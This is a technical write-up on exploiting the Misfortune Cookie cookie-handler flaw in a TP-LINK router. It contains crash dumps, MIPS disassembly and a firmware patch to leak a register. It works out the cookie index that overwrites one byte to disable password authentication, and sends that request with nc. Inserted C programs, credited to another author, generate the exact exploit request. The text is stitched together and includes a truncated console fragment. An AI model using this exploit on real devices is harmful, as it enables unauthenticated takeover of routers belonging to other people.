Misfortune Cookie Demystified
2012/05/18
ATSE
ATTI(h,m,s)
ATDA(y,m,d)
ATDS
ATDT
ATDUx,y
ATRBx
ATRWx
ATRLx
ATGO(x)
ATGR
ATGT
ATRTw,x,y(,z)
ATSH
ATDOx,y
ATTD
ATUR
ATFLx
ATSTx
ATSYx
ATVDx
ATPNx
ATFEx,y,...
ATMP
atgo bfc00000

Bootbase Version: VTC_SPI1.26 | 2012/12/26 16:00:00
RAM: Size = 8192 Kbytes
Found SPI Flash 2MiB Winbond W25Q16 at 0xbfc00000
SPI Flash Quad Enable
Turn off Quad Mode
RAS Version: 1.0.0 Build 121121 Rel.08870
System ID: $2.12.58.23(G04.BZ.4)3.20.7.0 20120518_V003 | 2012/05/18
$r0= 0x00000000  $at= 0x80350000  $v0= 0x00000000  $v1= 0x00000001
$a0= 0x00000001  $a1= 0x805D7AF8  $a2= 0xFFFFFFFF  $a3= 0x00000000
$t0= 0x8001FF80  $t1= 0xFFFFFFFE  $t2= 0x804A8F38  $t3= 0x804A9E47
$t4= 0x804A9460  $t5= 0x804A8A60  $t6= 0x804A9D00  $t7= 0x00000040
$s0= 0x804A8A60  $s1= 0x8040C114  $s2= 0x805E2BC8  $s3= 0x80042A70
$s4= 0x00000001  $s5= 0x8000007C  $s6= 0x8040E5FC  $s7= 0x00000000
$t8= 0x804A9E48  $t9= 0x00000000  $k0= 0x00000000  $k1= 0x8000007C
$gp= 0x8040F004  $sp= 0x805E2B60  $fp= 0x805E2BC8  $ra= 0x8003A3D0
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
805e2bc8: 80 5e 2b f8 80 04 2a 70 80 4e d5 ba 00 00 00 01  .^+...*p.N......
805e2bd8: 80 4e d5 ba 00 00 00 00 80 40 f8 ac 80 48 4e 29  .N.......@...HN)
805e2be8: 80 55 54 4c 42 5f 54 4c 42 53 00 ba 80 41 34 0c  .UTLB_TLBS...A4.
805e2bf8: 80 5e 2c 18 80 10 e5 e0 80 42 64 dc 80 4e d5 b9  .^,......Bd..N..
805e2c08: 80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0  .@.......@......
805e2c18: 80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00  .^,0...8.@......
805e2c28: 00 00 00 00 80 16 c4 28 80 5e 2c 40 80 10 ec 28  .......(.^,@...(
...
...
805e2f68: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805e2f78: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805e2f88: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805e2f98: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805e2fa8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805e2fb8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805e2fc8: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
current task   = httpd
dump task      = network
tx_stack_ptr   = 0x805D5990
tx_stack_start = 0x805D3AF0
tx_stack_end   = 0x805D5AEF
tx_stack_size  = 0x00002000
tx_run_count   = 0x00000220
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
805d5990: 00 00 00 00 80 5d 5a 70 80 44 2b f8 80 4a db 98  .....]Zp.D+..J..
805d59a0: 80 44 2c 8c 80 44 2c 90 80 44 2c 7c 80 44 2c 94  .D,..D,..D,|.D,.
805d59b0: 80 4a db 98 10 00 00 01 00 00 00 0a 00 00 00 00  .J..............
805d59c0: 80 1e cc ac 10 00 00 01 00 00 00 00 80 51 47 98  .............QG.
805d59d0: 00 00 00 00 00 00 05 dc 00 00 00 14 c0 a8 01 90  ................
805d59e0: 80 5d 5a 90 80 07 20 c8 80 45 23 34 00 00 00 01  .]Z... ..E#4....
805d59f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805d5a00: 00 00 00 00 80 4d ac 88 80 52 90 38 00 00 00 01  .....M...R.8....
805d5a10: c0 a8 01 90 00 00 00 01 80 5d 5a 90 80 51 47 98  .........]Z..QG.
805d5a20: 80 45 23 34 00 00 00 14 00 00 00 00 00 00 00 00  .E#4............
805d5a30: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  ................
805d5a40: 00 00 00 00 00 00 00 00 00 00 00 00 c0 a8 01 01  ................
805d5a50: 10 00 00 01 80 4a db 98 00 00 00 00 00 00 00 00  .....J..........
...
...
Reserve for Print when Crash
Erasing 4K Sector...
Erasing 4K Sector...
writeRomBlock(): Erase OK!
So the crash happened in the httpd task, and the program counter was at
0x8010E5D8. Let's look at the details in IDA Pro.
ROM:8010E5B0 loc_8010E5B0:                          # CODE XREF: sub_8010E574+ECj
ROM:8010E5B0                 li      $t7, 0x43      # 0x43='C'
ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
ROM:8010E5B8                 li      $a1, 0x3D
ROM:8010E5BC                 addiu   $s0, 1
ROM:8010E5C0                 move    $a0, $s0
ROM:8010E5C4                 jal     sub_8016C340
ROM:8010E5C8                 nop
ROM:8010E5CC                 move    $a0, $s0
ROM:8010E5D0                 move    $s1, $v0
ROM:8010E5D4                 addiu   $s1, 1
ROM:8010E5D8                 jal     sub_801F2E74
ROM:8010E5DC                 sb      $zero, -1($s1)
ROM:8010E5E0                 move    $a0, $s1
ROM:8010E5E4                 jal     sub_8016CA24
ROM:8010E5E8                 move    $s3, $v0
ROM:8010E5EC                 li      $a2, 0x28
ROM:8010E5F0                 mul     $t2, $s3, $a2
ROM:8010E5F4                 move    $a1, $s1
ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0
ROM:8010E604                 addu    $a0, $t5, $t2
ROM:8010E608                 jal     sub_8016A784
ROM:8010E60C                 sb      $zero, 0($at)
ROM:8010E610                 j       loc_8010E644
ROM:8010E614                 addu    $s0, $s1, $s0
ROM:8010E618 # ---------------------------------------------------------------------------

Excellent, this is exactly the code mentioned in [2]. A cookie of the form Cxxx=yyy
is handled like this: xxx is multiplied by 0x28 at ROM:8010E5F0, the product is added
to a base address computed at ROM:8010E5F8, and the sum becomes the destination
address into which yyy is copied at ROM:8010E608. Nothing in this path bounds xxx,
so it gives us an arbitrary overwrite. Separately, the router can be "unlocked" from
the serial console with "sys pswauthen 0", as shown below.
cawan$ curl 192.168.1.1
<html>
<head>
<title>Protected Object</title></head><body>
<h1>Protected Object</h1>Username or Password error</body></html>
TP-LINK> sys pswauthen 0
Do not need password authentication for configuration!
TP-LINK>
cawan$ curl 192.168.1.1
<html>
<head>
<title>
</title><meta http-equiv="Content-Type" content="text/html; charset=
iso-8859-1">
<meta http-equiv=Content-Script-Type content=text/javascript>
<meta http-equiv=Content-Style-Type content=text/css>
</head><frameset rows="65,75,*" framespacing="0" border="0" frameborder="0">
<frame name="header" noresize src="status.html" marginwidth="0" marginheight="0">
Excellent, the router is now running in "unlock" mode. Time to exploit the
vulnerability remotely. Looking at the httpd snippet again, we need the value of $s4
at ROM:8010E5F8 in order to compute the destination address of the write at
ROM:8010E608. Here is the snippet once more.
ROM:8010E5B0 loc_8010E5B0:                          # CODE XREF: sub_8010E574+ECj
ROM:8010E5B0                 li      $t7, 0x43      # 0x43='C'
ROM:8010E5B4                 bne     $v0, $t7, loc_8010E618
ROM:8010E5B8                 li      $a1, 0x3D
ROM:8010E5BC                 addiu   $s0, 1
ROM:8010E5C0                 move    $a0, $s0
ROM:8010E5C4                 jal     sub_8016C340
ROM:8010E5C8                 nop
ROM:8010E5CC                 move    $a0, $s0
ROM:8010E5D0                 move    $s1, $v0
ROM:8010E5D4                 addiu   $s1, 1
ROM:8010E5D8                 jal     sub_801F2E74
ROM:8010E5DC                 sb      $zero, -1($s1)
ROM:8010E5E0                 move    $a0, $s1
ROM:8010E5E4                 jal     sub_8016CA24
ROM:8010E5E8                 move    $s3, $v0
ROM:8010E5EC                 li      $a2, 0x28
ROM:8010E5F0                 mul     $t2, $s3, $a2
ROM:8010E5F4                 move    $a1, $s1
ROM:8010E5F8                 addiu   $t5, $s4, 0x6B28      # $s4 = 0x8040F8AC
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0
ROM:8010E604                 addu    $a0, $t5, $t2
ROM:8010E608                 jal     sub_8016A784
ROM:8010E60C                 sb      $zero, 0($at)
ROM:8010E610                 j       loc_8010E644
ROM:8010E614                 addu    $s0, $s1, $s0
ROM:8010E618 # ---------------------------------------------------------------------------

The problem now is how to get the value of $s4 at ROM:8010E5F8. Simple: copy the
content of $s4 into a rarely used register such as $s7 and then trigger a "kernel
panic" immediately, so that the register dump reveals it. We are going to change
ROM:8010E5FC                 move    $s0, $v0
ROM:8010E600                 addu    $at, $s1, $s0

to

ROM:8010E5FC                 add     $s7, $s4, $zero      = 0x0280b820
ROM:8010E600                 jr      $zero                = 0x00000008
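To check those two words before writing them into the image, here is an added example of mine (not part of the original write-up or of the firmware): a minimal MIPS32 R-type encoder and decoder that produces the patch at ROM:8010E5FC and decodes it back. The register numbers and SPECIAL function codes are the architectural ones; the one assumption is that the flash image is big-endian, which the 80 5e 2b f8 style words in the dumps above suggest.

```c
#include <inttypes.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* MIPS32 register numbers used by the patch. */
enum { R_ZERO = 0, R_AT = 1, R_V0 = 2, R_S0 = 16, R_S1 = 17, R_S4 = 20, R_S7 = 23 };
/* SPECIAL-class (opcode 0) function codes. */
enum { FN_JR = 0x08, FN_ADD = 0x20, FN_ADDU = 0x21 };

struct rtype { unsigned rs, rt, rd, shamt, funct; };

/* op(6)=0 | rs(5) | rt(5) | rd(5) | shamt(5) | funct(6) */
uint32_t encode_rtype(struct rtype f)
{
    return ((f.rs & 31u) << 21) | ((f.rt & 31u) << 16) | ((f.rd & 31u) << 11)
         | ((f.shamt & 31u) << 6) | (f.funct & 63u);
}

/* Returns 0 if the word is not a SPECIAL-class (R-type) instruction. */
int decode_rtype(uint32_t w, struct rtype *f)
{
    if ((w >> 26) != 0)
        return 0;
    f->rs = (w >> 21) & 31u;
    f->rt = (w >> 16) & 31u;
    f->rd = (w >> 11) & 31u;
    f->shamt = (w >> 6) & 31u;
    f->funct = w & 63u;
    return 1;
}

/* add rd, rs, rt  (funct 0x20; addu would be 0x21) */
uint32_t enc_add(unsigned rd, unsigned rs, unsigned rt)
{
    struct rtype f = { rs, rt, rd, 0, FN_ADD };
    return encode_rtype(f);
}

/* jr rs */
uint32_t enc_jr(unsigned rs)
{
    struct rtype f = { rs, 0, 0, 0, FN_JR };
    return encode_rtype(f);
}

/* The two replacement words for ROM:8010E5FC and ROM:8010E600, laid out
 * big-endian as they sit in flash (ASSUMPTION: big-endian image).
 * Returns the number of bytes produced, always 8. */
size_t patch_bytes(uint8_t out[8])
{
    uint32_t words[2] = { enc_add(R_S7, R_S4, R_ZERO), enc_jr(R_ZERO) };
    for (size_t i = 0; i < 2; i++) {
        out[4 * i + 0] = (uint8_t)(words[i] >> 24);
        out[4 * i + 1] = (uint8_t)(words[i] >> 16);
        out[4 * i + 2] = (uint8_t)(words[i] >> 8);
        out[4 * i + 3] = (uint8_t)(words[i]);
    }
    return 8;
}

int main(void)
{
    uint8_t bytes[8];
    struct rtype f;

    printf("ROM:8010E5FC add $s7, $s4, $zero = 0x%08" PRIX32 "\n",
           enc_add(R_S7, R_S4, R_ZERO));
    printf("ROM:8010E600 jr  $zero           = 0x%08" PRIX32 "\n", enc_jr(R_ZERO));
    patch_bytes(bytes);
    printf("bytes to write:");
    for (size_t i = 0; i < 8; i++)
        printf(" %02x", bytes[i]);
    printf("\n");
    if (decode_rtype(0x0280B820u, &f))
        printf("decoded: rs=%u rt=%u rd=%u funct=0x%02x\n", f.rs, f.rt, f.rd, f.funct);
    return 0;
}
```

The decoder is there so that a typo in a hand-assembled word shows up before the image is flashed: rs must be 20 ($s4), rd 23 ($s7) and the function code 0x20, otherwise the leak goes into the wrong register.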
istributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
run distributePvcFakeMac!
Press ENTER to continue...
Erasing 4K Sector...
Erasing 4K Sector...
writeRomBlock(): Erase OK!
Now simply send a cookie to the router, and it should "kernel panic" immediately.
cawan$ curl --header 'Cookie: C9=9' 192.168.1.1
At the UART port we see this right away :)
TLB refill exception occured!
EPC= 0x00000000
SR= 0x10000003
CR= 0x50805808
$RA= 0x80020000
Bad Virtual Address = 0x00000000
UTLB_TLBL ..\core\sys_isr.c:267 sysreset()
$r0= 0x00000000  $at= 0x80350000  $v0= 0x00000000  $v1= 0x00000001
$a0= 0x00000001  $a1= 0x805D7AF8  $a2= 0xFFFFFFFF  $a3= 0x00000000
$t0= 0x8001FF80  $t1= 0xFFFFFFFE  $t2= 0x804A8F38  $t3= 0x804A9E47
$t4= 0x804A9460  $t5= 0x804A8A60  $t6= 0x804A9D00  $t7= 0x00000040
$s0= 0x804A8A60  $s1= 0x8040C114  $s2= 0x805E2BC8  $s3= 0x80042A70
$s4= 0x00000001  $s5= 0x8000007C  $s6= 0x8040E5FC  $s7= 0x8040F8AC
$t8= 0x804A9E48  $t9= 0x00000000  $k0= 0x00000000  $k1= 0x8000007C
$gp= 0x8040F004  $sp= 0x805E2B60  $fp= 0x805E2BC8  $ra= 0x8003A3D0
          00 01 02 03 04 05 06 07 08 09 0A 0B 0C 0D 0E 0F
805e2bc8: 80 5e 2b f8 80 04 2a 70 80 4e fe 1e 80 4e fe 20  .^+...*p.N...N.
805e2bd8: 80 4e fe 21 00 00 00 09 80 40 f8 ac 80 48 4e 29  .N.!.....@...HN)
805e2be8: 80 55 54 4c 42 5f 54 4c 42 4c 00 21 80 1f 2e 88  .UTLB_TLBL.!....
805e2bf8: 80 5e 2c 18 80 10 e5 ec 80 42 64 dc 80 4e fe 1d  .^,......Bd..N..
805e2c08: 80 40 f8 ac 00 00 00 00 80 40 e6 0c 80 10 dc c0  .@.......@......
805e2c18: 80 5e 2c 30 80 10 d7 38 80 40 f8 ac 00 00 00 00  .^,0...8.@......
...
...
Fine, the EPC is 0x00000000, just as we wanted. Besides, $s7 is 0x8040F8AC, which
is the value of $s4 we were looking for. With $s4 = 0x8040F8AC, $t5 is
0x8040F8AC + 0x6B28 = 0x804163D4, the base address for the destination of the write.
Since we need to overwrite 0x8034FF94, the cookie index works out as:
0x8034FF94 - 0x804163D4 = 0xFFF39BC0          <- do it in Dword
0xFFF39BC0 % 0x28 = 0                           <- do it in Qword
0xFFF39BC0 / 0x28 = 0x06661718 = 107353880      <- do it in Qword
Because 0x8034FF94 is exactly the first byte of a 0x28-byte-aligned chunk, we can
overwrite just that single byte with a null character (0x00). Sending the specially
crafted request with curl is not an option, because curl pads the header with
0x0d0a0d0a; it is better to send it with nc. Put the crafted request in a file and
pipe it into nc to "unlock" the router remotely. Let's do it now.
cawan$ cat ./cawan_header | xxd
0000000: 4745 5420 2f20 4854 5450 2f31 2e31 0a55  GET / HTTP/1.1.U
0000010: 7365 722d 4167 656e 743a 2063 7572 6c2f  ser-Agent: curl/
0000020: 372e 3333 2e30 0a48 6f73 743a 2031 3932  7.33.0.Host: 192
0000030: 2e31 3638 2e31 2e31 0a41 6363 6570 743a  .168.1.1.Accept:
0000040: 202a 2f2a 0a43 6f6f 6b69 653a 2043 3130   */*.Cookie: C10
0000050: 3733 3533 3838 303d 000a                 7353880=..
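As an added example (mine, not code from the original write-up), the following C program models the cookie handler disassembled above and reproduces both the index calculation and the raw request in cawan_header. It assumes, from the argument setup alone and not from anything the page confirms, that sub_8016C340, sub_801F2E74, sub_8016CA24 and sub_8016A784 behave like strchr, atoi, strlen and strcpy; the constants 0x28, 0x8040F8AC + 0x6B28 and 0x8034FF94 are the ones recovered above. It goes one step beyond the write-up: for a target that is not the first byte of its chunk it also reports how long the value must be so that the copy's terminating NUL lands on the target.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Values recovered in the write-up. */
#define CHUNK   0x28u                  /* li $a2, 0x28 ; mul $t2, $s3, $a2     */
#define S4_VAL  0x8040F8ACu            /* $s4, leaked through $s7 in the dump  */
#define BASE    (S4_VAL + 0x6B28u)     /* addiu $t5, $s4, 0x6B28 = 0x804163D4  */
#define TARGET  0x8034FF94u            /* byte the write-up zeroes to "unlock" */

struct cookie_write {
    int      valid;   /* 0 unless the cookie parsed as Cnnn=value            */
    uint32_t idx;     /* nnn as the firmware's atoi-like routine returns it   */
    uint32_t dest;    /* BASE + idx*CHUNK, wrapping at 32 bits like addu      */
    uint32_t len;     /* strlen(value); the copy writes len+1 bytes at dest   */
};

/* Model of loc_8010E5B0..8010E60C.  ASSUMPTION (inferred from the argument
 * setup, not confirmed by the page): sub_8016C340 is strchr, sub_801F2E74 is
 * atoi, sub_8016CA24 is strlen and sub_8016A784 is strcpy.  Only the address
 * arithmetic is modelled; nothing is written to memory. */
struct cookie_write model_cookie(const char *cookie)
{
    struct cookie_write w = { 0, 0, 0, 0 };
    char name[64];

    if (cookie == NULL || cookie[0] != 'C')       /* li $t7, 'C' ; bne        */
        return w;
    strncpy(name, cookie + 1, sizeof name - 1);   /* addiu $s0, 1             */
    name[sizeof name - 1] = '\0';
    char *eq = strchr(name, '=');                 /* $a1 = '=' ; sub_8016C340 */
    if (eq == NULL)                               /* the listing shows no NULL */
        return w;                                 /* check; the model bails    */
    *eq = '\0';                                   /* sb $zero, -1($s1)        */
    w.idx  = (uint32_t)strtoul(name, NULL, 10);   /* sub_801F2E74             */
    w.len  = (uint32_t)strlen(eq + 1);            /* sub_8016CA24             */
    w.dest = BASE + w.idx * CHUNK;                /* mul ; addu, mod 2^32     */
    w.valid = 1;
    return w;
}

/* Inverse of the arithmetic: the cookie index that makes the copy's
 * terminating NUL land on `target`.  The subtraction wraps at 32 bits,
 * exactly like the addu in the handler (the "Dword" step above).  The
 * in-chunk remainder is the length the value must have: 0 for the
 * write-up's target, which is why a bare NUL after '=' is enough; r > 0
 * would also clobber the r bytes in front of the target. */
uint32_t index_for_target(uint32_t target, uint32_t *value_len)
{
    uint32_t diff = target - BASE;                /* 0xFFF39BC0 for TARGET    */
    *value_len = diff % CHUNK;                    /* 0 in the write-up        */
    return diff / CHUNK;                          /* 107353880 = 0x06661718   */
}

/* The raw request piped into nc: bare LF line endings and a literal 0x00
 * right after '=' so the copied value is empty and the only byte written is
 * the terminator.  Returns the byte count (90 for the write-up's index), or
 * 0 if `cap` is too small. */
size_t build_request(uint32_t idx, unsigned char *out, size_t cap)
{
    int n = snprintf((char *)out, cap,
                     "GET / HTTP/1.1\nUser-Agent: curl/7.33.0\n"
                     "Host: 192.168.1.1\nAccept: */*\nCookie: C%" PRIu32 "=", idx);
    if (n < 0 || (size_t)n + 2 > cap)
        return 0;
    out[n]     = 0x00;                            /* the byte curl cannot send */
    out[n + 1] = '\n';
    return (size_t)n + 2;
}

/* Byte image of cawan_header transcribed from the xxd output above. */
static const unsigned char WRITEUP_REQUEST[] =
    "GET / HTTP/1.1\nUser-Agent: curl/7.33.0\nHost: 192.168.1.1\n"
    "Accept: */*\nCookie: C107353880=\0\n";

int request_matches_writeup(void)
{
    unsigned char buf[128];
    size_t n = build_request(107353880u, buf, sizeof buf);
    return n == sizeof WRITEUP_REQUEST - 1 && memcmp(buf, WRITEUP_REQUEST, n) == 0;
}

int main(void)
{
    uint32_t vlen;
    uint32_t idx = index_for_target(TARGET, &vlen);
    char cookie[32];
    unsigned char req[128];

    snprintf(cookie, sizeof cookie, "C%" PRIu32 "=", idx);
    struct cookie_write w = model_cookie(cookie);
    printf("index %" PRIu32 " (0x%08" PRIX32 "), value length %" PRIu32 "\n", idx, idx, vlen);
    printf("Cookie: %s -> copy to 0x%08" PRIX32 " (%s)\n", cookie, w.dest,
           w.dest == TARGET ? "hits target" : "misses");
    printf("request bytes: %zu, matches write-up: %d\n",
           build_request(idx, req, sizeof req), request_matches_writeup());
    return 0;
}
```

Write the bytes returned by build_request() to a file and pipe it into nc exactly as with cawan_header; the request deliberately uses bare LF line endings, as the xxd listing shows.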